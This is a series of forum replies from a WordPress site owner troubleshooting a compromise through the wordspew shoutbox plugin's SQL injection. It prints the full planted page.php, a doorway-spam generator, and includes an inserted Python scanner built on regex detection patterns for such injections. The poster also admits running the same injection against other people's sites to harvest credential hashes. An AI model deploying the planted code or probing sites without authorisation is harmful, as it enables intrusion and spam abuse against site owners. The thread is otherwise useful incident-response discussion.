Forum Replies Created

Viewing 15 replies - 1 through 15 (of 36 total)
  • Thread Starter idahofallzcom

    (@idahofallzcom)

    It seems settled now: WordPress’ 2.3.3 update fixed the xmlrpc.php vulnerabilities, and Pierre released 3.72 wordspew to fix the SQL injection.

    I did attempt the injection on some other sites, just grayhatting, and got back the database usernames and passwords, but the passwords were all in md5 hash, and I could not get a single one to decipher in the various free engines.

    I wonder how the attacker gained access? Were they able to log in under some of my users who created weak passwords? After I updated users with stronger passwords some of them still got cracked again, and none of my users were admin, yet some spam links were pasted into my footer, and my entire page.php was replaced by malicious code. My password was a strong mix, so I don’t know how they were able to get in that far.

    Perhaps they got in as a low level user, then used another hack to find my admin info?

    Maybe will never know…

    Thread Starter idahofallzcom

    (@idahofallzcom)

    So far so good.

    Maybe one last bit of advice and wisdom for future inquiries. My site is one of the few that really use that shoutbox, since it’s locally focused on a city.

    I downloaded Rudd-O’s wordspew version 2.4 (latest) cuz it says it corrects the SQL injection that Pierre’s had. However, Pierre had some nicer anti-spam measures, and the ability to mark someone’s IP as a spammer, then they could not post anymore. Rudd-O’s does not, and I’m getting spam dropped every minute. That’s a no-go.

    So I went back to Pierre’s blog. Again, I was using the outdated 3.01, and I see Pierre is up to version 3.71. I’m reading through his changelog

    https://pierre.sudarovich.free.fr/index.php/2006/02/28/ajax-shoutbox/

    and it appears at versions 3.3 and 3.34 he fixed some SQL vulnerabilities. Unfortunately I cannot tell if he fixed the SQL vulnerability that allowed my site to get hacked.

    Can anyone verify yea or nay if the 3.71 wordspew from Pierre is secure from that SQL vulnerability (which BTW I found: https://www.milw0rm.com/exploits/5039 )

    thanks

    Thread Starter idahofallzcom

    (@idahofallzcom)

    Cool, I had not replaced the xmlrpc.php yet so we’re good. I think I can do what you’re describing, but as you suggested I’ll wait to see if I get hacked once more before trying.

    I’ll update later today if anything happens or not. The help is invaluable and much appreciated!

    Thread Starter idahofallzcom

    (@idahofallzcom)

    Okay, as I said I completely removed the xmlrpc.php file, so how do I do this logging? I am reading that other thread and you said to email you for the instructions to do that? Do I need to put xmlrpc.php back in there under a renamed filename, or?

    Thanks for the help!

    Thread Starter idahofallzcom

    (@idahofallzcom)

    I did not re-enable wordspew; I of course want to wait to make sure I’m not being attacked anymore. I of course also learned my lesson, and when I do re-enable wordspew I will go with the latest version and will deal with the functionality issues at that time.

    I went to delete the wordspew folder from my plugins directory, and it is gone already. Why would the hacker delete it? I looked in my other plugin folders and did not see it moved anywhere. It does not appear in my admin panel plugins activation page, either.

    Spybot found not a single issue on my system. I reinstalled my PC a few weeks ago so it is fairly fresh.

    I had one other admin account, but I demoted that account to a writer and changed its password.

    I’ll try changing my passwords again, but I’ve got a feeling this is not over.

    What is the hole here?

    Thread Starter idahofallzcom

    (@idahofallzcom)

    Dammit! I just checked my site about 30 minutes ago, no spam links. I check a moment ago again, and the spam links are back in my footer. I check footer.php and that same eval() link is there.

    HELP!?!? What is the hole here?

    Thread Starter idahofallzcom

    (@idahofallzcom)

    I went to bed last night hoping the activity was over, but it’s not. This morning there were three more post drafts saved, each taunting me for being hacked by worldhackerz.net, each under different existing usernames. I saved a local copy of the xmlrpc.php last night and completely deleted it, and I disabled the wordspew plugin. I’m running Spybot and Ad-Aware on my system now.

    Any other advice? I’m also still wondering “what’s 711 here and there?”

    Thread Starter idahofallzcom

    (@idahofallzcom)

    what’s 711 here and there?

    Thread Starter idahofallzcom

    (@idahofallzcom)

    Cool, I deleted the xmlrpc.php and the footer spam links. So far so good, but it’s still early.

    My host sent me the record showing I was attacked through the wordspew chatbox. I was running a slightly older 3.01 version cuz the new one kept blocking users.

    I would like to ensure the latest does not have the same attack vector as 3.01, though.

    Thread Starter idahofallzcom

    (@idahofallzcom)

    Man, and it continues.

    I noticed my pages weren’t loading, and I was generating HUGE error_logs. I deleted the error_log and two seconds later it was up to 62 MB. I finally got it downloaded and found errors related to a script running in page.php.

    This is what I found in my page.php:

    <?php
    $tpl = "/home/.numnod/mwsmedia/mattselznick.com/gfx/t-m-p.html";
    $repl = "<REPL>";
    $w1 = file("/home/.numnod/mwsmedia/mattselznick.com/gfx/key1.txt");
    $w2 = file("/home/.numnod/mwsmedia/mattselznick.com/gfx/key1.txt");
    $w3 = file("/home/.numnod/mwsmedia/mattselznick.com/gfx/key1.txt");
    $w4 = file("/home/.numnod/mwsmedia/mattselznick.com/gfx/key1.txt");
    $w5 = file("/home/.numnod/mwsmedia/mattselznick.com/gfx/key1.txt");
    $w6 = file("/home/.numnod/mwsmedia/mattselznick.com/gfx/key1.txt");
    $w7 = file("/home/.numnod/mwsmedia/mattselznick.com/gfx/key1.txt");
    $w8 = file("/home/.numnod/mwsmedia/mattselznick.com/gfx/key1.txt");
    $w9 = file("/home/.numnod/mwsmedia/mattselznick.com/gfx/key1.txt");
    $w10 = file("/home/.numnod/mwsmedia/mattselznick.com/gfx/key1.txt");
    $w11 = file("/home/.numnod/mwsmedia/mattselznick.com/gfx/key1.txt");
    $w12 = file("/home/.numnod/mwsmedia/mattselznick.com/gfx/key1.txt");
    $w13 = file("/home/.numnod/mwsmedia/mattselznick.com/gfx/key1.txt");
    $keys = file("/home/.numnod/mwsmedia/mattselznick.com/gfx/key1.txt");
    $wr1 = $w1[rand(0, count($w1)-1)];
    $wr2 = $w2[rand(0, count($w2)-1)];
    $wr3 = $w3[rand(0, count($w3)-1)];
    $wr4 = $w4[rand(0, count($w4)-1)];
    $wr5 = $w5[rand(0, count($w5)-1)];
    $wr6 = $w6[rand(0, count($w6)-1)];
    $wr7 = $w7[rand(0, count($w7)-1)];
    $wr8 = $w8[rand(0, count($w8)-1)];
    $wr9 = $w9[rand(0, count($w9)-1)];
    $wr10 = $w10[rand(0, count($w10)-1)];
    $wr11 = $w11[rand(0, count($w11)-1)];
    $wr12 = $w12[rand(0, count($w12)-1)];
    $wr13 = $w13[rand(0, count($w13)-1)];
    $q = $_GET['go'];
    $q = ereg_replace(".htm", "", $q);
    $q = ereg_replace("-", " ", $q);
    $fp = fopen($tpl, "r");
    $fin = '';
    while (!feof($fp))
         $fin .= fgets($fp, 1024);
    fclose($fp);
    $fin = ereg_replace($repl, $q, $fin);
    $rd = rand(0,10000);
      $rd = $rd."";
     $rd2 = rand(0,10000);
      $rd2 = $rd2."";
     $rd3 = rand(0,10000);
      $rd3 = $rd3."";
     $rd4 = rand(0,10000);
      $rd4 = $rd4."";
     $rd5 = rand(0,10000);
      $rd5 = $rd5."";
    $fin = ereg_replace("<SOME>", $rd , $fin);
    $fin = ereg_replace("<SOME2>", $rd2 , $fin);
    $fin = ereg_replace("<SOME3>", $rd3 , $fin);
    $fin = ereg_replace("<SOME4>", $rd4 , $fin);
    $fin = ereg_replace("<SOME5>", $rd5 , $fin);
    $wr1l = ereg_replace(" ","-" , $wr1);
    $fin = ereg_replace("<KEY1>", $wr1, $fin);
    $fin = ereg_replace("<KEY1l>", $wr1l, $fin);
    $wr2l = ereg_replace(" ","-" , $wr2);
    $fin = ereg_replace("<KEY2>", $wr2, $fin);
    $fin = ereg_replace("<KEY2l>", $wr2l, $fin);
    $wr3l = ereg_replace(" ","-" , $wr3);
    $fin = ereg_replace("<KEY3>", $wr3, $fin);
    $fin = ereg_replace("<KEY3l>", $wr3l, $fin);
    $wr4l = ereg_replace(" ","-" , $wr4);
    $fin = ereg_replace("<KEY4>", $wr4, $fin);
    $fin = ereg_replace("<KEY4l>", $wr4l, $fin);
    $wr5l = ereg_replace(" ","-" , $wr5);
    $fin = ereg_replace("<KEY5>", $wr5, $fin);
    $fin = ereg_replace("<KEY5l>", $wr5l, $fin);
    $wr6l = ereg_replace(" ","-" , $wr6);
    $fin = ereg_replace("<KEY6>", $wr6, $fin);
    $fin = ereg_replace("<KEY6l>", $wr6l, $fin);
    $fin = ereg_replace("<KEY7>", $wr7, $fin);
    $fin = ereg_replace("<KEY8>", $wr8, $fin);
    $fin = ereg_replace("<KEY9>", $wr9, $fin);
    $fin = ereg_replace("<KEY10>", $wr10, $fin);
    $fin = ereg_replace("<KEY11>", $wr11, $fin);
    $fin = ereg_replace("<KEY12>", $wr12, $fin);
    $fin = ereg_replace("<KEY13>", $wr13, $fin);
    $n = 10;
    $links = "";
    for ($i=0; $i<$n; $i++)
    {
      $rankey = trim($keys[rand(0, count($keys)-1)]);
      $ranhref = ereg_replace(" ", "-", $rankey)."";
      $links = $links." <a href='./?go=$ranhref.htm'>$rankey</a><br>";
    }
    $fin = ereg_replace("<LINK>", $links, $fin);
    echo $fin;
    ?>

    Man I’m getting hacked hard here, any advice to batten down the hatches?
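    As an added example (not code from the thread or from WordPress), a small scanner that walks a theme directory for the markers the poster describes: the eval() call in footer.php, the ?go= doorway generator in page.php, and bulk file() reads of a keyword list from another account’s home directory. The sample files, the temporary directory and the marker list are constructed assumptions, not the poster’s actual files.

```python
import os
import re
import tempfile

# Markers taken from the incident in the thread: eval() in footer.php, a
# ?go= doorway generator in page.php, file() reads of /home/<other>/...
INDICATORS = {
    "eval_call": re.compile(r"\beval\s*\("),
    "get_go_param": re.compile(r"\$_GET\s*\[\s*['\"]go['\"]\s*\]"),
    "ereg_replace": re.compile(r"\bereg_replace\s*\("),
    "foreign_home_read": re.compile(r"\bfile\s*\(\s*['\"]/home/"),
}

def scan_file(path):
    """Return (indicator, line_no, stripped_line) hits for one PHP file."""
    hits = []
    with open(path, encoding="utf-8", errors="replace") as fh:
        for no, line in enumerate(fh, 1):
            hits += [(n, no, line.strip()) for n, rx in INDICATORS.items()
                     if rx.search(line)]
    return hits

def scan_tree(root):
    """Map relative path -> hits for every .php file under root."""
    report = {}
    for dirpath, _, files in os.walk(root):
        for full in (os.path.join(dirpath, f) for f in files if f.endswith(".php")):
            hits = scan_file(full)
            if hits:
                report[os.path.relpath(full, root)] = hits
    return report

# Constructed sample theme (assumption): a clean header.php, a footer.php
# carrying an eval() spam hook, and a page.php doorway stub.
SAMPLES = {
    "header.php": "<?php wp_head(); ?>\n<body>\n",
    "footer.php": "<div id='footer'>\n<?php eval($x); ?>\n</div>\n",
    "page.php": ("<?php\n$w1 = file(\"/home/.x/other/gfx/key1.txt\");\n"
                 "$q = $_GET['go'];\n$q = ereg_replace(\".htm\", \"\", $q);\n?>\n"),
}

def demo():
    """Write the samples to a temp dir, scan it and return the report."""
    root = tempfile.mkdtemp()
    for name, body in SAMPLES.items():
        with open(os.path.join(root, name), "w", encoding="utf-8") as fh:
            fh.write(body)
    return scan_tree(root)

if __name__ == "__main__":
    for path, hits in sorted(demo().items()):
        for name, no, line in hits:
            print(f"{path}:{no}: {name}: {line}")
```

    Point scan_tree() at wp-content/themes or wp-content/plugins; core files are better checked by diffing against a clean copy of the same WordPress version.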

    Thread Starter idahofallzcom

    (@idahofallzcom)

    I ended up using the plugin “Restrict Author Access to Edit Comments” which does the job. Folks can still click to that page but they meet a “not authorized” text instead of all the links. It works well enough, thanks plugin author!

    https://www.laboratoriocaffeina.it/development/2007/07/20/restrict-authors-access-to-edit-comments-the-plugin.html

    It might help you understand that search engines do see your WordPress site as HTML because the WP engine processes PHP and MySQL data then returns HTML code to the browser.

    Do a View > Source code in your browser and you will see your posts are presented in HTML code such as h2 and paragraph tags. This is similar enough to what those search engine bots see.

    Thread Starter idahofallzcom

    (@idahofallzcom)

    2. Errr, in regards to this step, just to be crystal clear to newbies: there was a PHP code section at the top of css.css that you delete entirely, and you will notice smaller PHP code chunks in the CSS settings, usually for the color specifications.

    Delete those PHP code chunks also, and replace them with normal hexadecimal color codes (#ffffff or #abcdef).

    Thread Starter idahofallzcom

    (@idahofallzcom)

    Eeek! I need to update and resolve this.

    I did as suggested and visited those forums.

    Being polite and respectful, I first searched through the forums for similar topics.

    It took a little digging but I was able to find another person who solved this by:

    1. Renamed the wordspew’s css.php into a css.css

    2. Deleted the PHP references in the css.css

    3. Within the main PHP file, changed the single call to css.php to, of course, css.css

    Only drawback is that your color changes made within the WordPress admin page do not work. Not a big deal, especially for folks like me that like to tweak those things at code level anyways.

    Thanks for the tip carnold and thanks for having those forums up and helping folks Gamerz
